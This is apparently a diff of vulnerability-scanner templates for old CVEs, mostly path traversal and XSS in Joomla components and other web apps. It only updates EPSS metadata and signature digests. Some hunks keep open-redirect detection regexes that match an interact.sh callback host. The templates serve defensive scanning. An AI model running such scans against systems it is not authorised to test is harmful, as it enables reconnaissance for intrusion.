# digest: 490a00463044022050ca3abd41b7a8790876bb71ef0029af7c1d3b0e0544f2abf58240f3000abf63022076b95e94ca23fbdfe25e9c2b47e3045597936f6fa0314d14a648ccdca2eb00da:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450221008c0fa09d7e8c694dc7105cfaab0728b292e9f1fb35718b39a789d2dbfcf8d9e6022009feea3382655492a454dd96e53596208cb39b74999770c0fc464d8903faefb1:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2008-6172
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00509
|
||||
epss-percentile: 0.73878
|
||||
epss-percentile: 0.73893
|
||||
cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a00463044022100cf12a496a98b373e671db1555f53050b4f874542eb7c4e561ac05a5b3ee82bc9021f28240e0134b63680639583ff251618f61c8877468680c7167355950be78132:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a8f25c1a929970a9204a61603d8ef5745406ce352991c1bd557392c7390f0526022031f4036a9b12781e782ef3b1ce91b6771ac933ca7fd40a938b2e14156c8bebe2:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2008-6222
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01029
|
||||
epss-percentile: 0.82156
|
||||
epss-percentile: 0.82168
|
||||
cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a0046304402202ede9b919b6d7accd90801325a4fec9c6a8f7e6b601d1ed94c6eac1ac7d10010022044c43a6dda78ed1e231af8f4675fdc8e8c411df00b08a2013f832a056870b0dd:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100b675ad635f6dbf29a92e43d9100e056d571b2610e718efbfa6d202e0f0ff8d67022100c8adbb8a70d42a7c31ec1bc5c4c76042b193575d6f0d47243d8ac507e6c3a1be:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2008-6465
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00421
|
||||
epss-percentile: 0.71378
|
||||
epss-percentile: 0.71408
|
||||
cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -52,4 +52,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a004630440220150c8fb316ebb5b4272c06194cab258807f721c216b934a2c28f803eacfe28aa0220184b9b79ee1956651fda313eb547834cf2735f382594cd3d4d40683ff6ca4ddb:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402202dd387d46c916e28f4eee03d372912151ddd10cb78a21a07248614647871d8e302201d134c02bb05cb7f8f1ac68e8cbc8b2a79d7228123c46f888d4469ff11d3f482:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2008-6668
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00359
|
||||
epss-percentile: 0.69077
|
||||
epss-percentile: 0.69089
|
||||
cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
@ -43,4 +43,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100f792e47b3da9d7610e5a3027d30b7f186fdbbf91dd7ddc26989256450746d5eb022100e0e6dc2981295db23d21d2c39e23f2aa130031b20ef52c8a7b9c493bf6a7a7e9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100bfe6688b85b25d1dee5e6659cb29102ce04fc449847d3eb937a9ceb0497f1ed6022009da4bb15e18dde8aaccac28d6e1345948a0a82c91dc8970dda445e9b4d7b16d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2008-6982
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.0038
|
||||
epss-percentile: 0.69949
|
||||
epss-percentile: 0.6997
|
||||
cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -49,4 +49,4 @@ http:
|
|||
status:
|
||||
- 500
|
||||
|
||||
# digest: 4b0a0048304602210080132bf646dfdd4f0e763204e71b8b6391ebf0f6c05466fb55c03704dae76b2f0221008272624fb13b921b08822ab053fb505d561194e8d3c27adb518315f223805934:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100d4e595273fa534a6db0cdb445082cab3c06a543eed33b95345f9422e33db7da9022100e26e967af2670c9e53467b38f28a33ef83f6657eee86a6a7fae4acd63b83347c:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2008-7269
|
||||
cwe-id: CWE-20
|
||||
epss-score: 0.01358
|
||||
epss-percentile: 0.84719
|
||||
epss-percentile: 0.84721
|
||||
cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: "true"
|
||||
|
@ -38,4 +38,4 @@ http:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||
|
||||
# digest: 4a0a004730450221008248c44c3eaa2910a322fdc4d6c92472afc173043f29f4623f94864ff108609402204285790abc07f244424314eb6b66ed9e69d90e93da7b0abf942c30a4f4ec820e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502202b243abaeefe8b567efffd791fceea668c3e25cdb375a6a4eaabbc3db5cc76c2022100fe9466f301b7fb2026e7b9d0ca0149d25df375fe2ee0b9673394d54cd70dd389:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -20,7 +20,7 @@ info:
|
|||
cve-id: CVE-2009-0347
|
||||
cwe-id: CWE-59
|
||||
epss-score: 0.10982
|
||||
epss-percentile: 0.94559
|
||||
epss-percentile: 0.94557
|
||||
cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||
|
||||
# digest: 4a0a00473045022100d25c225b89639ccc077e0721999005019bd768df3be0f6917fb3c09f157fb55e0220322e9974ff4b32d8d1a832c2949a373ba7985e59e994c7004a3b7fd3d25c1dee:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b34fed516d6d84a9a461f6dc5e8e0a23a9395bf670b226de485ddaccacc40fca0220204a9628af0018626ee1d07a9ea7d6c3aae89a5743011b49efb8cf750744e578:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2009-0932
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.04048
|
||||
epss-percentile: 0.91152
|
||||
epss-percentile: 0.91149
|
||||
cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -42,4 +42,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022043f118e0e82ce6800db189e37e0be5678ade6652165af7528eb8eaccadca90a102210084fcbfeb9766bbaf3f31e192e8cc9373b1b199148bab872b74840e285a0020e0:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100de48ef0c35d98731ab93e9af8cc54479b2b74c69e8af857527aa75e16653f67f02203a406fcfecf51e49833bdfa2a09271a35de75e5a48dc1a8fb427c9891fad2278:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2009-1151
|
||||
cwe-id: CWE-94
|
||||
epss-score: 0.79256
|
||||
epss-percentile: 0.97961
|
||||
epss-percentile: 0.97962
|
||||
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -48,4 +48,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100f2941b3c9e8b37114507c61e3d59a7853d371670b241e8460684427f2187018102204448f53c187dc057a87f6b6cf685b4f883aa16909463e56081f31ed8dded9105:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100ff9fd88ac89c0479da9170d6242a3adbb68e4b0b9f713221044bd76e61bf52c3022100bfb1b2723d86b520a470dd8973fe007050bb47bd0c30d6c8e15e93a7359a7def:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2009-1496
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00648
|
||||
epss-percentile: 0.77021
|
||||
epss-percentile: 0.77031
|
||||
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100ed2839d9059bdb2b7d4cc617084fa7fe3e1c1847f440dec8a525bea893f69bba0220020a22419aad89d4fddcc11ae50cacb35c9ee656a49aafac0b23d319d1a67430:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100fbfdcf8a7166ea569a9059f9dd8c61943ee81ebc4879d4c2c0c5af34adf88f060221009e5476e3de6c67dc0b0c3ed19d533cdb0b2d4803261cd414d5eb220db57870f8:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2009-1558
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00891
|
||||
epss-percentile: 0.80785
|
||||
epss-percentile: 0.80792
|
||||
cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -42,4 +42,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100cc0adf7870cd1e89f051cd0f2bbf90ceff80da8dbb20bb3ce6414d194909c77b022100c771d5e0605a0935c901be90990c4af8a8d1de9a5e07e30d5650dbbfb1e04ec6:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100934b97c38661edf980bf67989f369483963a76b9cbfecf66f3adcddbb4440b67022100b82acc3cec31a7c23426cda07eab93de81ca3096205eeef7803321259f6b6fb6:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,8 +17,8 @@ info:
|
|||
cvss-score: 4.3
|
||||
cve-id: CVE-2009-1872
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.40155
|
||||
epss-percentile: 0.96899
|
||||
epss-score: 0.37553
|
||||
epss-percentile: 0.96829
|
||||
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -49,4 +49,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100ec2a50c1a18e3183f4638d9b0f701785ef601808f4883aa41539f87ac08f4032022100b31493a5c264c6e313d46250dd94a2f1e416955efa5814588fddc666a19d9390:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502202072ea1c5fce81ecd5ea760a932b89f4ec83518e3f437870c5b87ee9a76aa35e022100b257d805b29806c75b8c49d540a61d8f8a0d94443a433fb8f63399e30e8de90e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2009-2015
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00797
|
||||
epss-percentile: 0.79631
|
||||
epss-percentile: 0.79641
|
||||
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a0046304402207a51686c03795ff1d4d220e5b1e5280fd75a7a7afd452d69e2753e48dbaa00b402202a5b01ddfd0e410e05ec664fb706c6cbea85de3ff7c3dd68ba567d1313583478:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502206c1e9d8464e23a9475d028afa1eb073b2c4fa514a173756ebcc85e55f6ff556c022100c4b0b282a8d340627147f5dd17052d18ba0c47b1fd19dc196b58a1f4b40890c7:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2009-2100
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00517
|
||||
epss-percentile: 0.74087
|
||||
epss-percentile: 0.741
|
||||
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a0046304402205b1e26b6deec10d3d090544d6a2918540c3d973feb9f15306e9f1feabc5a686002202b19b28b82045773a4154e8960eb69839450350d58cafcca16ae50be9e999955:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a0048304602210082b758e58555ad8b2e7f465df2017464842fd9e6d016b27c1c0c8e52e1b68249022100c5702f2e6b40ba2a2f8cb73959777a0ae09edd5b27bc129a7347f404033229fb:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2009-3053
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00367
|
||||
epss-percentile: 0.69473
|
||||
epss-percentile: 0.69484
|
||||
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022047b06a9256498eb6156d2f3f69b7568f20beb721e5e19cc79add124e03e85046022100bfb142be8d0a87f714b18e3e323701999a6dca9973893569e147c92043d3a6f7:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a004830460221009ea670383367fd99c725d526526446bf6ebe478fac82aa67270fd29130714231022100d9c6a4370c06f44ee7dd1b4eeab3a152c2f9c3a9bb2e2fdad2f5ea10d2c652f2:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2009-3318
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00706
|
||||
epss-percentile: 0.78156
|
||||
epss-percentile: 0.78165
|
||||
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100cbe8ac7c01bc8fce8b6a311b29ad52a9a18102652d7991d9042fdfd805bbb95302204ccec8244192927aa9d6fe6b39f1ef8fcb602961205e9b155841c0b059ff9a55:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022017e1c560fcda210a616715e20ccdf6701456ab5cf9c5e87a1c8f0a0605d59f750220184e7691a120e2b5896481e20804edeaf40d758d4b3400d32460858c9ab9e579:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2009-4202
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01956
|
||||
epss-percentile: 0.87399
|
||||
epss-percentile: 0.87398
|
||||
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502205eb96d06601f30deaaea5c7a96c205638500426c8181fad8b2b734a9921452c4022100ac26f85d202c0002596cdae1b53634e949aa4162ce9c7cd0ac0eeb91c8eb4df3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022033acd1a644e371ef75dbb2a0b0dc7205e644cd3642bf5199a5b6c87f8b5a101002200865cf0b0341149fcf513e38d5493ae243d28e433da4e5c79c8f53c4f729df58:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2009-4223
|
||||
cwe-id: CWE-94
|
||||
epss-score: 0.00697
|
||||
epss-percentile: 0.77987
|
||||
epss-percentile: 0.77996
|
||||
cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -43,4 +43,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a004630440220575e82958101dc76b0638080480314d124ac784d9bea4f448bb0a8077f8d2cea02200d9e5c5fd2a9f368686cbe246f14fc6e70cba9d123bdfb2677d61059d360d89a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a0048304602210097e88a1e0317eaccbae4842108019b7bc76c90322083cb40f7a1951d3761187a022100f0ebd19ae9e67b3dbadd3fd62e51a5c0ee6bc8e8a4bcb8a2fe9961eae94db836:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2009-4679
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00826
|
||||
epss-percentile: 0.79999
|
||||
epss-percentile: 0.80009
|
||||
cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022061adc4a304e86c45130dbca10f26cc1773fe97d2823eff73cc25271d94bdc74a0221009518c6d5e2b864a6b62f70a5358e33e497a48a5eaaf90e3670373a40637b4e2b:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100aaa4e1a6ddcfdd7630f753cae3f4dd3fde31a464c3fd3aaf53524ce32e3b37e702203e8703820a4ecc1be519dc42703ecae38aa255e22660733a0a0dfad13f6f3b20:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cve-id: CVE-2009-5020
|
||||
cwe-id: CWE-20
|
||||
epss-score: 0.00215
|
||||
epss-percentile: 0.59406
|
||||
epss-percentile: 0.59417
|
||||
cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
@ -36,4 +36,4 @@ http:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
|
||||
|
||||
# digest: 4a0a00473045022100ebfd19148ea6d9290d97d1f0d145f547a8aa105063b4c0ab287f65951faaf99d02207e879b9bc96d11f9d11b1b8a317343a7e25910825f63c1678faf9f1cc80b9400:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100bab79078c26c76bb2b9ca4bf572ab985f32efdca47d63c09ce231933e3ed219c02203468c43a820cb0de55d876cbdbeb474d04fc57cf462010c17e03fac80112f8fd:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022030969a4a55abe99bfbeaf2d152c379a7e6a8698838cb7cb57b7c2a5f1d68e5e502210085ea519468190b8a3edda3d2bed9780de7a4c60535103c10b2c238b2757aceb4:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a31c3417342db59984fbd56e37a9d2bb19e946c6bb781a5b555ec98193afa844022017d5b5f523e4073ac8fd842d50fc02c19b2f39b9e682b93ad01c968737b6e2d5:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2010-0157
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00826
|
||||
epss-percentile: 0.79999
|
||||
epss-percentile: 0.80009
|
||||
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a00463044022053406c17623996e299489b4aa04a1c450ad1bee6c8e926c91ff93517296404dc02204f5a289d5dbf24fca59476355ee78f41f0f74e0e5afe310482e936fba7dcde9f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220570c46c0bcbb317e0fc352bbc410cdc235defbd54f0043651ab890efdd0513dd02210097c8c549462d71c8cdc19c4462333a38fb9a26d3256505806b896a7fa736a2b7:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2010-0219
|
||||
cwe-id: CWE-255
|
||||
epss-score: 0.97494
|
||||
epss-percentile: 0.99974
|
||||
epss-percentile: 0.99975
|
||||
cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
@ -60,4 +60,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a0048304602210098b3be4092008832ee790a1b6a03855cec6fcd0c9108ea0907b5f52149c81b08022100830aec2a3f3be5867eb39698c139490513940b1b64058febedbb23189009d5ec:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402204a33fe20c4f85e380689cae677b008e8091a665425822cb958aeb14bae8bb6b302206a4e8ae18e801c631625ebe1894cc7c91ea42704e92c68602cdf7d9ff9470a9e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.0586
|
||||
epss-percentile: 0.92616
|
||||
epss-percentile: 0.92622
|
||||
cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100d1b4d5c0c846b63c42713ffc19e972ee3f283dc7f6c6ae17a565b594f2d9365b022100e6ae34cccb64e6ec97217862e3e3acfba4f84a1e1e88a7a8f645e23c1828c231:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402207470c2efae6ac9b73496668a589b5dc0d016fdc36f876825663e48116d4757070220724f1b987976d49405d297f935b11a8034ce3b28e5c59670f8223340d82d7865:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-0696
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.62698
|
||||
epss-percentile: 0.97511
|
||||
epss-percentile: 0.97516
|
||||
cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100fa9a4ae043c59fdc850ac22de27bf34c5a46accb2e2306277e1cdcefb20f5d33022100dfd721eb274369565e66bf651de73fce8cfed327f214223aa542579a771cc1d3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100cd6a5f1690a95ace049ff0a44c28bf89718e4db66d952938c741909ccf611cf5022006194e2966fa5bdd2de52be7206240b0a5eb73e0f11ee2764bece746f6bc7251:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-0759
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01326
|
||||
epss-percentile: 0.84522
|
||||
epss-percentile: 0.84524
|
||||
cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a0046304402205c7274aacb2c3bf35036340f828ce80815543e30e57186be8615d7883260ee7a02204d18f147767e07aac82b54c8fc97a742608e06de8b90c442c42ea91adaa5e4b3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100826af694f6a358f512b026a5347619fca6ab71491609102c2604c51ee823ea78022100de48a2128bcef850d2b3b315069b94c18bef1e3f1b2b11e1c92af9770fdc69e2:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-0942
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00477
|
||||
epss-percentile: 0.73043
|
||||
epss-percentile: 0.73062
|
||||
cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022068c2b03308c85376c341fe4b993f1f331ba2f4a3b7832b10512e7abda040a61d022100f86c7c9284ccd75b5dea2ba39203e7d81cfdd87d0500ab95e0cf8d63b955f1e2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100c3785d81f3190f808b22dd60f6599a2aa7aab1b62681cb910b9e951b0255bd690220415844b6e2d1c8d16c50de2cb6aa6885341812efc436712044eb301db217bc9e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-0943
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01155
|
||||
epss-percentile: 0.83233
|
||||
epss-percentile: 0.83238
|
||||
cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100ef0f271ce4869959deea6c21e419a280e4851d4d65107ba38c5eb8489863f4f40221009b3117da85d617db7a43c29b3a7de1cfe599e50954ce0643073c0607a9ed93b5:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220587fd115cb0f32dc0abb0515e4892ce667b4329ffce0f546a356689919971182022100c020247b25f704f0f2ef38f9c44530a877b04477401b13116754bfc68f237a67:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2010-0944
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00477
|
||||
epss-percentile: 0.73043
|
||||
epss-percentile: 0.73062
|
||||
cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a004730450221009c9dbf6c19437d631789f539362182e9424ef4f11d3631321633ecc0036ed7710220735442f24e8387be4641b6d114d9161100ee3803273feb0e594189363e68f559:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022024c17889487206ad144df3129785457d4cdc742b2a11ed6836fb63057c4e9e26022100bd77d50cef40049e8875cf8495dec84a21568df4c097d1b67b10c17767e0d82a:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-0972
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00813
|
||||
epss-percentile: 0.79822
|
||||
epss-percentile: 0.79832
|
||||
cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502200757f533a0fb665c4650675dba43dc191bcd4b7cb07729d902036a3099d9cb0b02210092510583206b85372826a8bc0accd9a6b7442321bbcc03fb7f330deef3528c04:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ed8b316e6ca8b4ae37bd34082a709667ef31b4134bf974c7ae515595c7dc369f02205483aee92e1d54977f8b83476bf673ef60590c5904538cab039ea96e862acef1:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cve-id: CVE-2010-0982
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.0087
|
||||
epss-percentile: 0.80505
|
||||
epss-percentile: 0.80511
|
||||
cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -38,4 +38,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
